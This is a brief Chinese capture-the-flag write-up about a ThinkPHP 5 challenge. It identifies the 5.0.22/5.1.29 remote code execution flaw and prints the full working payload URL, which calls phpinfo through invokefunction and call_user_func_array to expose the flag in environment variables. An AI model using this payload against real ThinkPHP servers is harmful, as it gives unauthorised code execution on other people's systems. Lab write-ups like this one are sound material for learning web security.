[ThinkPHP]5-Rce1打开发现是一个ThinkPHP5+框架，直接用ThinkPHP扫描工具检测出是一个ThinkPHP5.0.22/5.1.29的RCE漏洞，访问Payload?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1直接在phpinfo()的环境变量里面找到flag